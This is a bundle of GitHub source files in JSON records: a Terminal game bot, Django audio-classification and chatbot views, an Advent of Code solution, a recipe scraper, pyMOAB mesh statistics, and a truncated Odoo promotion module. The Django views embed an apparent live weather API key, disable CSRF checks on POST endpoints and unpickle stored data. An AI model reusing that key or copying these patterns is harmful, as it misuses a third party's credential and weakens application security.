on_turn(self, turn_state):\n \"\"\"\n This function is called every turn with the game state wrapper as\n an argument. The wrapper stores the state of the arena and has methods\n for querying its state, allocating your current resources as planned\n unit deployments, and transmitting your intended deployments to the\n game engine.\n \"\"\"\n game_state = gamelib.GameState(self.config, turn_state)\n gamelib.debug_write('Performing turn {} of your custom algo strategy'.format(game_state.turn_number))\n game_state.suppress_warnings(True) #Comment or remove this line to enable warnings.\n\n self.starter_strategy(game_state)\n\n game_state.submit_turn()\n\n\n \"\"\"\n NOTE: All the methods after this point are part of the sample starter-algo\n strategy and can safely be replaced for your custom algo.\n \"\"\"\n\t \n def starter_strategy(self, game_state):\n game_state.attempt_spawn(ENCRYPTOR,[9, 9],1)\n game_state.attempt_spawn(ENCRYPTOR,[18, 9],1)\n game_state.attempt_spawn(EMP, [6, 7], 1)\n game_state.attempt_spawn(EMP, [21, 7], 1)\n game_state.attempt_spawn(SCRAMBLER, [9, 4], 1)\n game_state.attempt_spawn(PING, [20, 6], 1)\n \"\"\"\n For defense we will use a spread out layout and some Scramblers early on.\n We will place destructors near locations the opponent managed to score on.\n For offense we will use long range EMPs if they place stationary units near the enemy's front.\n If there are no stationary units to attack in the front, we will send Pings to try and score quickly.\n \"\"\"\n # First, place basic defenses\n self.build_defences(game_state)\n # Now build reactive defenses based on where the enemy scored\n self.build_reactive_defense(game_state)\n\n # If the turn is less than 5, stall with Scramblers and wait to see enemy's base\n if game_state.turn_number < 5:\n self.stall_with_scramblers(game_state)\n else:\n # Now let's analyze the enemy base to see where their defenses are concentrated.\n # If they have many units in the front we can build a line for our EMPs to attack them at long range.\n if self.detect_enemy_unit(game_state, unit_type=None, valid_x=None, valid_y=[14, 15]) > 10:\n self.emp_line_strategy(game_state)\n else:\n # They don't have many units in the front so lets figure out their least defended area and send Pings there.\n\n # Only spawn Ping's every other turn\n # Sending more at once is better since attacks can only hit a single ping at a time\n if game_state.turn_number % 2 == 1:\n # To simplify we will just check sending them from back left and 
right\n                    ping_spawn_location_options = [[8, 5], [19, 5]]\n                    best_location = self.least_damage_spawn_location(game_state, ping_spawn_location_options)\n                    game_state.attempt_spawn(PING, best_location, 1000)\n\n                # Lastly, if we have spare cores, let's build some Encryptors to boost our Pings' health.\n                encryptor_locations = [[10, 7], [17, 7], [8, 9], [10, 9], [17, 9], [19, 9]]\n                game_state.attempt_spawn(ENCRYPTOR, encryptor_locations)\n                game_state.attempt_upgrade(encryptor_locations)\n\n\n    def build_defences(self, game_state):\n        \"\"\"\n        Build basic defenses using hardcoded locations.\n        Remember to defend corners and avoid placing units in the front where enemy EMPs can attack them.\n        \"\"\"\n        # Useful tool for setting up your base locations: https://www.kevinbai.design/terminal-map-maker\n        # More community tools available at: https://terminal.c1games.com/rules#Download\n\n        # Place destructors that attack enemy units\n        destructor_locations = [[3, 12], [26, 12], [17, 12], [11, 12], [1, 12], [25, 12], [2, 12], [2, 11], [24, 12], [4, 11], [25, 11], [3, 11], [23, 11], [13, 12], [3, 10], [12, 12], [19, 12], [24, 11]]\n        # attempt_spawn will try to spawn units if we have resources, and will check if a blocking unit is already there\n        game_state.attempt_spawn(DESTRUCTOR, destructor_locations)\n        \n        # Place filters in front of destructors to soak up damage for them\n        filter_locations = [[0, 13], [27, 13], [1, 13], [26,13], [2,13], [25,13],[4, 13], [24, 13]]\n        game_state.attempt_spawn(FILTER, filter_locations)\n        # upgrade destructors and filters so they survive longer\n        game_state.attempt_upgrade(destructor_locations)\n        game_state.attempt_upgrade(filter_locations)\n        \n\n    def build_reactive_defense(self, game_state):\n        \"\"\"\n        This function builds reactive defenses based on where the enemy scored on us from.\n        We can track where the opponent scored by looking at events in action frames \n        as shown in the on_action_frame function\n        \"\"\"\n        for location in self.scored_on_locations:\n            # Build destructor one space above so that it doesn't block our own edge spawn locations\n            build_location = [location[0], location[1]+2]\n            game_state.attempt_spawn(DESTRUCTOR, build_location)\n            game_state.attempt_upgrade(build_location)\n\n    def stall_with_scramblers(self, game_state):\n        \"\"\"\n        Send out Scramblers at random locations to defend our base from enemy moving units.\n        \"\"\"\n        # We can spawn moving units on our edges, so build a list of all our edge locations\n        friendly_edges = game_state.game_map.get_edge_locations(game_state.game_map.BOTTOM_LEFT) + game_state.game_map.get_edge_locations(game_state.game_map.BOTTOM_RIGHT)\n        \n        # Remove locations that are blocked by our own firewalls \n        # since we can't deploy units there.\n        deploy_locations = self.filter_blocked_locations(friendly_edges, game_state)\n        \n        # While we have remaining bits to spend let's send out scramblers randomly.\n        while game_state.get_resource(BITS) >= game_state.type_cost(SCRAMBLER)[BITS] and len(deploy_locations) > 0:\n            # Choose a random deploy location.\n            deploy_index = random.randint(0, len(deploy_locations) - 1)\n            deploy_location = deploy_locations[deploy_index]\n            \n            game_state.attempt_spawn(SCRAMBLER, deploy_location)\n            \"\"\"\n            We don't have to remove the location since multiple information \n            units can occupy the same space.\n            \"\"\"\n\n    def emp_line_strategy(self, game_state):\n        \"\"\"\n        Build a line of the cheapest stationary unit so our EMPs can attack from long range.\n        \"\"\"\n        # First let's figure out the cheapest unit\n        # We could just check 
the game rules, but this demonstrates how to use the GameUnit class\n# stationary_units = [FILTER, DESTRUCTOR, ENCRYPTOR]\n# cheapest_unit = FILTER\n# for unit in stationary_units:\n# unit_class = gamelib.GameUnit(unit, game_state.config)\n# if unit_class.cost[game_state.BITS] < gamelib.GameUnit(cheapest_unit, #game_state.config).cost[game_state.BITS]:\n# cheapest_unit = unit\n\n # Now let's build out a line of stationary units. This will prevent our EMPs from running into the enemy base.\n # Instead they will stay at the perfect distance to attack the front two rows of the enemy base.\n# for x in range(27, 5, -1):\n# game_state.attempt_spawn(cheapest_unit, [x, 11])\n\n # Now spawn EMPs next to the line\n # By asking attempt_spawn to spawn 1000 units, it will essentially spawn as many as we have resources for\n# game_state.attempt_spawn(EMP, [24, 10], 1000)\n\n def least_damage_spawn_location(self, game_state, location_options):\n \"\"\"\n This function will help us guess which location is the safest to spawn moving units from.\n It gets the path the unit will take then checks locations on that path to \n estimate the path's damage risk.\n \"\"\"\n damages = []\n # Get the damage estimate each path will take\n for location in location_options:\n path = game_state.find_path_to_edge(location)\n damage = 0\n for path_location in path:\n # Get number of enemy destructors that can attack the final location and multiply by destructor damage\n damage += len(game_state.get_attackers(path_location, 0)) * gamelib.GameUnit(DESTRUCTOR, game_state.config).damage_i\n damages.append(damage)\n \n # Now just return the location that takes the least damage\n return location_options[damages.index(min(damages))]\n\n def detect_enemy_unit(self, game_state, unit_type=None, valid_x = None, valid_y = None):\n total_units = 0\n for location in game_state.game_map:\n if game_state.contains_stationary_unit(location):\n for unit in game_state.game_map[location]:\n if unit.player_index == 1 and (unit_type is None or unit.unit_type == unit_type) and (valid_x is None or location[0] in valid_x) and (valid_y is None or location[1] in valid_y):\n total_units += 1\n return total_units\n \n def filter_blocked_locations(self, locations, game_state):\n filtered = []\n for location in locations:\n if not game_state.contains_stationary_unit(location):\n filtered.append(location)\n return filtered\n\n def on_action_frame(self, turn_string):\n \"\"\"\n This is the action frame of the game. 
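        (From the parsing below: each breach event is a list whose element 0 is
        the [x, y] location and whose element 4 identifies the owner, with 1
        meaning yourself; the remaining fields are not used here.)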
This function could be called \n        hundreds of times per turn and could slow the algo down so avoid putting slow code here.\n        Processing the action frames is complicated so we only suggest it if you have time and experience.\n        Full doc on format of a game frame at: https://docs.c1games.com/json-docs.html\n        \"\"\"\n        # Let's record at what position we get scored on\n        state = json.loads(turn_string)\n        events = state[\"events\"]\n        breaches = events[\"breach\"]\n        for breach in breaches:\n            location = breach[0]\n            unit_owner_self = True if breach[4] == 1 else False\n            # When parsing the frame data directly, \n            # 1 is integer for yourself, 2 is opponent (StarterKit code uses 0, 1 as player_index instead)\n            if not unit_owner_self:\n                gamelib.debug_write(\"Got scored on at: {}\".format(location))\n                self.scored_on_locations.append(location)\n                gamelib.debug_write(\"All locations: {}\".format(self.scored_on_locations))\n\n\nif __name__ == \"__main__\":\n    algo = AlgoStrategy()\n    algo.start()\n","repo_name":"Evansun0622/Ternimal-Live-AI-Coding-Competition","sub_path":"algo_strategy.py","file_name":"algo_strategy.py","file_ext":"py","file_size_in_byte":12376,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"5727783243","text":"from django.http import Http404, JsonResponse\nfrom django.shortcuts import render\nfrom chatbot.chatbot import create_chatbot\nimport threading\nimport pickle\nimport collections\nfrom io import BytesIO\nimport numpy as np\nimport urllib.request\nimport json\nimport wave\nimport librosa\nimport pandas as pd\nfrom homepage.models import Memory, Person, Raw_Conversation\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom sklearn.naive_bayes import GaussianNB\nfrom chatterbot.trainers import ListTrainer\nurl =\"https://samples.openweathermap.org/data/2.5/weather?q=Eberstadt,%20DE&appid=b6907d289e10d714a6e88b30761fae22\"\nimport sys\nnp.set_printoptions(threshold=sys.maxsize)\n\n#====Create chatbot\nchatbot = create_chatbot()\n#====\ndef get_mfcc_feature(data):\n    \"\"\"\n    Converts raw audio data into its MFCC features\n    @args:\n        data(binary):\n    @return:\n        mfcc_features(np.array)\n    \"\"\"\n    fs=44100\n    x = librosa.util.fix_length(data, 45000)\n    mfcc_features = librosa.feature.mfcc(y=x, sr=fs)\n\n    return mfcc_features\n\n\ndef get_person(request,name_person):\n\n    count = Person.objects.filter(first_name=name_person).count()\n    if count==0:\n        p1 = Person(first_name=name_person)\n        p1.save()\n        return JsonResponse({\"name_person\": \"unknown\"})\n\n    else:\n        return JsonResponse({\"name_person\": \"known\"})\n\n\n@method_decorator(csrf_exempt, name='post')\ndef classify_audio(request):\n    '#0.Step: Get data for classification'\n    data = request.body\n    '#1.Step: Check that the byte length is divisible by 2'\n    if len(data)%2==0:\n        data_float_raw = librosa.util.buf_to_float(data)\n    else:\n        data_float_raw = librosa.util.buf_to_float(data[:-1])\n\n    '#2.Step: Trim the beginning and ending silence'\n    data_float, index = librosa.effects.trim(data_float_raw)\n    '#0.1.Step: Get mfcc feature for data'\n    prediction_mfcc = get_mfcc_feature_data(data_float)\n    '#0.2.Step: Flatten mfcc '\n    prediction_mfcc_fl = prediction_mfcc.flatten()\n    '#1.Step: Load all data from database table Memory'\n    df = pd.DataFrame(list(Memory.objects.all().values()))\n    '#2.Step: Create train_label and train_data'\n    train_data_list = []\n    for i in range(0, len(df)):\n        train_data_list.append(\n            bytes_numpy(df.loc[i, 
\"blob_data_mfcc\"]).flatten()\n            )\n    train_data = np.array(train_data_list)\n\n    train_label = df[\"ground_truth\"].values\n    '#3.Step: Fit bayes classifier'\n    clf = GaussianNB()\n    clf.fit(train_data, train_label)\n    '#4.Step: Make prediction'\n    prediction = clf.predict([prediction_mfcc_fl])\n    print(prediction)\n    '# Make relative prediction'\n    relative_predict = clf.predict_log_proba([prediction_mfcc_fl]) / clf.predict_log_proba([prediction_mfcc_fl]).sum()\n    relative_predict_round_flat = np.around(relative_predict * 100, 4).flatten()\n\n    '#Step: Combine the classes with their relative probabilities'\n    result_dict = {}\n    for el_cl, el_pre in zip(clf.classes_, relative_predict_round_flat):\n        result_dict[el_cl] = el_pre\n\n    '#Step: Sort the dict'\n    d_sorted = dict(sorted(result_dict.items(), key=lambda kv: kv[1]))\n    print(d_sorted)\n    return JsonResponse({\"prediction\": d_sorted})\n\n\ndef home(request ):\n    return render(request, 'home.html')\n\n@method_decorator(csrf_exempt, name='post')\ndef recorded_audio(request):\n    data = request.body\n    ground_truth = request.headers[\"Ground-Truth\"]\n    '#1.Step: Check that the byte length is divisible by 2'\n    if len(data)%2==0:\n        data_float = librosa.util.buf_to_float(data)\n    else:\n        data_float = librosa.util.buf_to_float(data[:-1])\n\n    '#1.Step: Get the raw data'\n    np_bytes = BytesIO()\n    np.save(np_bytes, data_float, allow_pickle=True)\n    np_bytes_raw = np_bytes.getvalue()\n    '#2.Step: Get the mfcc features'\n    mfcc = get_mfcc_feature_data(data_float)\n    np_bytes = BytesIO()\n    np.save(np_bytes, mfcc, allow_pickle=True)\n    np_bytes_mfcc = np_bytes.getvalue()\n    m1 = Memory(ground_truth=ground_truth,blob_data_raw=data,\n                blob_data_float=np_bytes_raw, blob_data_mfcc=np_bytes_mfcc)\n    m1.save()\n\n    return JsonResponse({\"successfully\":\"Successfully saved to db\"})\n\ndef reco(request):\n    return render(request, 'reco.html')\n\ndef audio(request):\n    '#1.Step: Get all memories for the table'\n    all_memories = Memory.objects.all()\n\n    all_memories_list = []\n    for el in all_memories.values('ground_truth').distinct():\n        key_word = el[\"ground_truth\"]\n        Memory.objects.filter(ground_truth=key_word)\n        count = Memory.objects.filter(ground_truth=key_word).count()\n        all_memories_list.append({\"ground_truth\":key_word,\n                                  \"count\":count\n                                  })\n    return render(request,'record_audio.html',{\"Person\":\"Gustav\",\"all_memories_list\":all_memories_list})\n\n\ndef get_weather(request):\n    url = 'http://api.openweathermap.org/data/2.5/weather?q=Eberstadt,ger&units=metric&lang=de&APPID=b3b25ed86b9fb6cfaac03f9b37164eef'\n    req = urllib.request.urlopen(url)\n    req_con = req.read().decode('utf-8')\n    req_json = json.loads(req_con)\n    return JsonResponse(req_json)\n\n\ndef chatbot_answer(request,name_person_global,person_statement):\n    '#1.Step: Get the chatbot response to the question'\n    print(\"hello\")\n    chatbot_response = chatbot.get_response(person_statement)\n    '#2.Step: Save conversation for training'\n    task = threading.Thread(target=save_to_db, args=(name_person_global,person_statement,chatbot_response))\n    '#2.1.Step: Define task as daemon so that the main program can exit and the saving to db happens in another thread'\n    task.daemon = True\n    task.start()\n\n    return JsonResponse({\"chatbot_response\":str(chatbot_response)})\n\n\ndef train_chatbot(request,optional_answer_chatbot,person_statement):\n\n    trainer = ListTrainer(chatbot)\n    trainer.train([person_statement,optional_answer_chatbot])\n    return JsonResponse({\"successful_trained\": f\"person_statement: {person_statement},\"+\n                                               f\"optional_answer_chatbot:{optional_answer_chatbot}\"})\n\n# Compute 
MFCC features from the raw audio data\ndef get_mfcc_feature_data(data):\n    \"\"\"\n    Converts raw audio data into its MFCC features\n    @args:\n        data(np.array): raw audio samples\n    @return:\n        mfcc_features(np.array)\n    \"\"\"\n    fs = 44100\n    x = librosa.util.fix_length(data, 45000)\n    mfcc_features = librosa.feature.mfcc(y=x, sr=fs)\n\n    return mfcc_features\n\n\ndef save_to_db(name_person_global,person_statement,chatbot_response):\n    \"\"\"\n    saves one conversation record to the database\n    @args:\n        - name_person_global (str): e.g. \"gustav\"\n        - person_statement(str): e.g. \"Wie heißt du?\" (\"What is your name?\")\n        - chatbot_response (str): e.g. \"ich heiße Felix\" (\"my name is Felix\")\n\n    \"\"\"\n    rc = Raw_Conversation(person_name=name_person_global,person_statement=person_statement,\n                          chatbot_response=chatbot_response)\n    rc.save()\n\n\ndef bytes_numpy(bytes_raw):\n    load_bytes = BytesIO(bytes_raw)\n    loaded_np = np.load(load_bytes, allow_pickle=True)\n    return loaded_np","repo_name":"gwillig/octocat","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3704822537","text":"TREE = \"#\"\nPATH = \".\"\n\n\ndef load_file(filename):\n    for row in open(filename, \"r\"):\n        yield row\n\n\ndef load_puzzle_into_list():\n    grid = []\n    for idx, line in enumerate(load_file(\"./input.txt\")):\n        grid.append([char for char in line if char != \"\\n\"])\n\n    return grid\n\n\ndef traverse_puzzle(puzzle, *params):\n    right_step = params[0]\n    down_step = params[1]\n\n    cur_row = cur_col = new_col = hit_tree = 0\n\n    while cur_row < len(puzzle) - 1:\n        # print(puzzle[cur_row][cur_col])\n        row_length = len(puzzle[cur_row + 1])  # 31\n\n        try:\n            new_col += right_step\n            if new_col >= row_length:\n                new_col = new_col - row_length\n\n            if puzzle[cur_row + down_step][new_col] == TREE:\n                hit_tree += 1\n\n        except IndexError as e:\n            print(new_col)\n\n        cur_row += down_step\n        cur_col = new_col\n\n    return hit_tree\n\n\ndef solve():\n    puzzle = load_puzzle_into_list()\n\n    slopes = [(1, 1), (3, 1), (5, 1), (7, 1), (1, 2)]\n    product = 1\n    for slope in slopes:\n        product *= traverse_puzzle(puzzle, *slope)\n    print(product)\n\n\nsolve()\n","repo_name":"13scoobie/advent-of-code","sub_path":"2020/day3/problem_3_part_2.py","file_name":"problem_3_part_2.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38312735188","text":"from url_database import url_list as urls\nfrom fractions import Fraction\nfrom bs4 import BeautifulSoup\nimport unicodedata\nimport requests\nimport re\n\nmeasurements = ([' ml ',' mL ',' milliliter ',' milliliters ',' millilitre ',' millilitres ',\n' cc ',' l ',' L ',' liter ',' liters ',' litre ',' litres ',' teaspoon ',' teaspoons ',\n' tablespoon ',' tablespoons ',' T ',' tbl ',' tbs ',' tbsp ',' fluid ounce ',' fluid ounces ',\n' fl oz ',' gill ',' gills ',' cup ',' cups ',' c ',' pint ',' pints ',' p ',' pt ',' pts ',\n' fl pt ',' fl pts ',' quart ',' quarts ',' q ',' qt ',' fl qt ',' fl qts ',' gallon ',\n' gallons ',' g ',' gal ',' gals ',' mg ',' milligram ',' milligrams ',' milligramme ',\n' milligrammes ',' g ',' gs ',' gram ',' grams ',' gramme ',' grammes ',' kg ',' kgs ',\n' kilogram ',' kilograms ',' kilogramme ',' kilogrammes ',' pound ',' pounds ',' lb ',' lbs ',\n' # ',' ounce ',' ounces ',' oz ', ' stick ', ' sticks '])\nnumdict = {\n    \"One\" : 1,\n    \"Two\" : 2,\n    \"Three\" : 3,\n    \"Four\" : 4,\n    \"Five\" : 5,\n    \"Six\" : 6,\n    \"Seven\" : 7,\n    \"Eight\" : 8,\n    
\"Nine\" : 9,\n \"Ten\" : 10,\n}\n\ndef scraper(url):\n # Request HTML for URL then parse it\n result = requests.get(url)\n soup = BeautifulSoup(result.text, \"html.parser\")\n\n # Look for Food Network's recipe name by looking for meta element that contains the following condition\n scraped_recipe_name = soup.find(\"meta\", {\"property\" : \"og:title\"})\n # Item content contains name\n recipe_name = scraped_recipe_name[\"content\"]\n recipe_name = recipe_name.replace(\"'\",\"\")\n\n # Look for Food Network's ingredients checklist by looking for input elements that contain the following conditions \n shopping_list = soup.find_all(\"input\", {\"class\" : \"o-Ingredients__a-Ingredient--Checkbox\"}, {\"type\" : \"checkbox\"})\n # Item \"value\" contains ingredient + quantity\n scraped_ingred_quant = [item[\"value\"] for item in shopping_list[1:]]\n\n return recipe_name, scraped_ingred_quant\n\ndef cleanup(scraped_ingred_quant):\n ingredient_list = []\n list = []\n for item in scraped_ingred_quant:\n try:\n # Cleanup HTML encoding '\\xa0'\n item = unicodedata.normalize('NFKD', item)\n # 'One' -> '1', 'Two' -> '2', 'Three' -> '3'\n for key, value in numdict.items():\n if key in item:\n item = item.replace(key, str(value))\n # If string contains a digit\n if any(char.isdigit() for char in item):\n # and if string contains a unit of measurement\n if any(unit in item for unit in measurements):\n # then split accordingly\n x_unit = ''\n for unit in measurements:\n if unit in item and item.index(unit) <= 7:\n if '-' in item and item.index('-') < item.index(unit):\n list = number_no_unit(item, list)\n # If multiple units exist in one string, iterate with earlier unit\n # e.g. '5 tablespoons plus 3 ounces melted butter' <- Why do people do this?\n # Keep iterating until earliest unit is found\n elif item.index(unit) < item.index(x_unit) or item.index(x_unit) == 0:\n x_unit = unit\n list = item.split(x_unit, 1)\n try:\n # If ' ' exists, that means quantity is separated and requires addition\n # e.g. 1 1/2 cups, 2 2/5 teaspoons\n if ' ' in list[0]:\n num_list = list[0].split(' ', 1)\n total = sum(round(float(Fraction(x)), 2) for x in num_list)\n list[0] = str(total)\n # Convert any fractions to floats\n elif '/' in list[0]:\n list[0] = str(round(float(Fraction(list[0])), 2))\n list.insert(1, x_unit)\n except ValueError:\n # ValueError occurs if multiple units exist in one string and algorithm iterates the later one\n # Not sure how else to work around this\n continue\n elif unit in item and item.index(unit) > 7:\n list = number_no_unit(item, list)\n else:\n list = number_no_unit(item, list)\n else:\n list = ['', '', item]\n # Remove leading/trailing whitespace and quotes in string\n list = [s.strip() for s in list]\n list = [s.replace(\"'\",\"\") for s in list]\n ingredient_list.append(list)\n except:\n # If error (ValueError specifically), continue\n continue\n return ingredient_list\n\ndef number_no_unit(item, list):\n # Search for the first digit in the item\n num = (re.search(r'\\d+', item).group())\n # If '/' exists, e.g. 
1/2 onion\n # Combine x/y to get fraction, assumes no fraction of x/yy\n if '/' in item and item.index('/') <= 4:\n if '(' in item and item.index(num) < item.index('('):\n num = (re.search(r'\\d+', item).group())\n else:\n num = item[item.index(num):item.index('/') + 2]\n if ' ' in num and item.index(' ') < item.index('/'):\n num_list = num.split(' ', 1)\n total = sum(round(float(Fraction(x)), 2) for x in num_list)\n num = str(total)\n if '-' in num and item.index('-') < item.index('/'):\n num_list = num.split('-', 1)\n total = sum(round(float(Fraction(x)), 2) for x in num_list)\n num = str(total)\n # and split accordingly\n list = item.split(num, 1)\n list[0] = str(round(float(Fraction(num)), 2))\n list.insert(1, '')\n\n return list\n\ndef url_cycler(urls):\n # Cycle through URls and create a list of tuples\n # Each tuple contains (recipe name, [list of ingredients]) \n for url in urls:\n recipe_name = scraper(url)[0]\n raw_ingred_quant = scraper(url)[1]\n \n ingredient_list = cleanup(raw_ingred_quant)\n yield recipe_name, ingredient_list\n\nname_and_ingredients = url_cycler(urls)\n# Convert generator to list\nname_and_ingredients = list(name_and_ingredients)\n\n# Remove any duplicates using dict by making keys out of recipe names since keys are unique\nunique_name_and_ingredients = []\nfor name in dict(name_and_ingredients).keys():\n # 'next' function to iterate through all duplicate ingredient lists until last one\n unique_name_and_ingredients += [(name, next(y for x, y in name_and_ingredients if x == name))]\n\nif __name__ == \"__main__\":\n print(unique_name_and_ingredients)\n","repo_name":"AvramEnriquez/Food-Network_Recipe-Ingredients-Database","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"19759458172","text":"# set the path to find the current installation of pyMOAB\nimport sys\nimport numpy as np\nsys.path.append(\n '/opt/tljh/user/lib/moab/lib/python3.6/site-packages/pymoab-5.1.0-py3.6-linux-x86_64.egg')\nfrom pymoab.rng import Range\nfrom pymoab import core, types\n\n\ndef get_dagmc_tags(my_core):\n \"\"\"\n Get a dictionary with the important tags for DAGMC geometries\n \n inputs\n ------\n my_core : a MOAB Core instance\n \n outputs\n -------\n dagmc_tags : a dictionary of relevant tags\n \"\"\"\n\n dagmc_tags = {}\n\n dagmc_tags['geom_dim'] = my_core.tag_get_handle('GEOM_DIMENSION', size=1, tag_type=types.MB_TYPE_INTEGER, \n storage_type=types.MB_TAG_SPARSE, create_if_missing=True) # geometric dimension\n\n dagmc_tags['category'] = my_core.tag_get_handle('CATEGORY', size=32, tag_type=types.MB_TYPE_OPAQUE, \n storage_type=types.MB_TAG_SPARSE, create_if_missing=True) # the category\n\n dagmc_tags['global_id'] = my_core.tag_get_handle('GLOBAL_ID', size=1, tag_type=types.MB_TYPE_INTEGER, \n\n storage_type=types.MB_TAG_SPARSE, create_if_missing=True) # id\n\n return dagmc_tags\n\n\ndef get_native_ranges(my_core, meshset, entity_types):\n \"\"\"\n Get a dictionary with MOAB ranges for each of the requested entity types\n \n inputs\n ------\n my_core : a MOAB Core instance\n meshset : a MOAB meshset to query for the ranges of entities\n entity_types : a list of valid pyMOAB types to be retrieved\n \n outputs\n -------\n native_ranges : a dictionary with one entry for each entity type that is a\n Range of handles to that type\n \"\"\"\n\n native_ranges = {}\n for entity_type in entity_types:\n native_ranges[entity_type] = 
my_core.get_entities_by_type(\n            meshset, entity_type)\n    return native_ranges\n\n\ndef get_entityset_ranges(my_core, meshset, geom_dim):\n    \"\"\"\n    Get a dictionary with MOAB Ranges that are specific to the types.MBENTITYSET\n    type\n    \n    inputs\n    ------\n    my_core : a MOAB Core instance\n    meshset : the root meshset for the file\n    geom_dim : the tag that specifically denotes the dimension of the entity\n    \n    outputs\n    -------\n    entityset_ranges : a dictionary with one entry for each entityset type, \n                       and the value is the range of entities that correspond to each\n                       type\n    \"\"\"\n    \n    entityset_ranges = {}\n    entityset_types = ['Nodes', 'Curves', 'Surfaces', 'Volumes']\n    for dimension, set_type in enumerate(entityset_types):\n        entityset_ranges[set_type] = my_core.get_entities_by_type_and_tag(meshset, types.MBENTITYSET, geom_dim,\n                                                                          [dimension])\n    return entityset_ranges\n\n\ndef get_triangles_per_vertex(my_core, native_ranges):\n    \"\"\"\n    This function will return data about the number of triangles on each\n    vertex in a file\n    \n    inputs\n    ------\n    my_core : a MOAB Core instance\n    native_ranges : a dictionary containing ranges for each native type in the file (VERTEX, TRIANGLE, ENTITYSET)\n    \n    outputs\n    -------\n    t_p_v_data : a list of the number of triangles each vertex touches\n    \"\"\"\n    \n    t_p_v_data = []\n    tri_dimension = 2\n    for vertex in native_ranges[types.MBVERTEX]:\n        t_p_v_data.append(my_core.get_adjacencies(vertex, tri_dimension).size())\n    return np.array(t_p_v_data)\n    \n    \ndef get_triangles_per_surface(my_core, entity_ranges):\n    \"\"\"\n    This function will return data about the number of triangles on each\n    surface in a file\n    \n    inputs\n    ------\n    my_core : a MOAB Core instance\n    entity_ranges : a dictionary containing ranges for each type in the file \n                    (VOLUME, SURFACE, CURVE, VERTEX, TRIANGLE, ENTITYSET)\n    \n    outputs\n    -------\n    t_p_s : a dictionary containing the entityhandle of the surface,\n            and the number of triangles each surface contains.\n            i.e. {surface entityhandle : triangles it contains}\n    \"\"\"\n\n    t_p_s = {}\n    for surface in entity_ranges['Surfaces']:\n        t_p_s[surface] = my_core.get_entities_by_type(\n            surface, types.MBTRI).size()\n    return t_p_s\n\n    \ndef get_surfaces_per_volume(my_core, entityset_ranges):\n    \"\"\"\n    Get the number of surfaces that each volume in a given file contains\n    \n    inputs\n    ------\n    my_core : a MOAB core instance\n    entity_ranges : a dictionary of the entityset ranges of each tag in a file\n    \n    outputs\n    -------\n    s_p_v : a dictionary containing the volume entityhandle\n            and the number of surfaces each volume in the file contains\n            i.e. 
{volume entityhandle:surfaces it contains}\n \"\"\"\n\n s_p_v = {}\n for volumeset in entityset_ranges['Volumes']:\n s_p_v[volumeset] = my_core.get_child_meshsets(volumeset).size()\n return s_p_v\n\n\ndef get_triangle_aspect_ratio(my_core, meshset, geom_dim):\n\n \"\"\"\n Gets the triangle aspect ratio (according to the equation: (abc)/(8(s-a)(s-b)(s-c)), where s = .5(a+b+c).)\n \n inputs\n ------\n my_core : a MOAB Core instance\n meshset : a meshset containing a certain part of the mesh\n geom_dim : a MOAB Tag that holds the dimension of an entity.\n \n outputs\n -------\n t_a_r : (list) the triangle aspect ratios for all triangles in the meshset\n \"\"\"\n\n if my_core.tag_get_data(geom_dim, meshset)[0][0] == 3:\n entities = my_core.create_meshset()\n for surface in my_core.get_child_meshsets(meshset):\n my_core.add_entities(entities, my_core.get_entities_by_type(surface, types.MBTRI))\n tris = my_core.get_entities_by_type(entities, types.MBTRI)\n else:\n tris = my_core.get_entities_by_type(meshset, types.MBTRI)\n\n t_a_r = []\n\n for triangle in tris:\n side_lengths = []\n s = 0\n coord_list = []\n\n verts = list(my_core.get_adjacencies(triangle, 0))\n\n for vert in verts:\n coords = my_core.get_coords(vert)\n coord_list.append(coords)\n\n for side in range(3): \n side_lengths.append(np.linalg.norm(coord_list[side]-coord_list[side-2]))\n # The indices of coord_list includes the \"-2\" because this way each side will be matched up with both\n # other sides of the triangle (IDs: (Side 0, Side 1), (Side 1, Side 2), (Side 2, Side 0))\n \n s = .5*(sum(side_lengths))\n top = np.prod(side_lengths)\n bottom = 8*np.prod(s-side_lengths)\n t_a_r.append(top/bottom)\n\n return t_a_r\n","repo_name":"epickhardt/dagmc_stats","sub_path":"dagmc_stats.py","file_name":"dagmc_stats.py","file_ext":"py","file_size_in_byte":6692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"74680482712","text":"from odoo import api, models, fields\nfrom odoo.addons.promotion_program.models.promotion_program import OrderLine, Reward\n\n\nclass SaleOrder(models.Model):\n\n _inherit = 'sale.order'\n\n promotion_ids = fields.Many2many('promotion.program', \n 'order_promotion_rel', \n 'order_id', \n 'promotion_id', \n 'Promotions', \n compute='_compute_promotion_ids')\n\n @api.depends('date_order', 'team_id')\n def _compute_promotion_ids(self):\n for order in self:\n if order.team_id and order.date_order:\n date = fields.Datetime.context_timestamp(order, order.date_order).date()\n order.promotion_ids = self.env['promotion.program']._get_available_promotions(date=date, \n teams=order.team_id)\n else:\n order.promotion_ids = []\n\n def apply_promotion(self):\n action = {\n 'name': 'Select Promotion',\n 'type': 'ir.actions.act_window',\n 'res_model': 'get.sale.promotion',\n 'context': {\n 'default_date_order': self.date_order,\n 'default_partner_id': self.partner_id.id,\n 'default_order_id': self.id,\n 'default_currency_id': self.currency_id.id,\n 'default_company_id': self.company_id.id,\n },\n 'target': 'new',\n 'view_mode': 'form',\n }\n return action\n\n def remove_promotions(self):\n promotion_lines = self.order_line.filtered(lambda l: l.promotion_id)\n promotion_lines.unlink()\n\n\nclass SaleOrderLine(models.Model):\n\n _inherit = 'sale.order.line'\n\n promotion_id = fields.Many2one('promotion.program', 'Promotion')\n promotion_account_id = fields.Many2one('account.account', 'Promotion COA')\n\n def _prepare_invoice_line(self, **optional_values):\n values = 
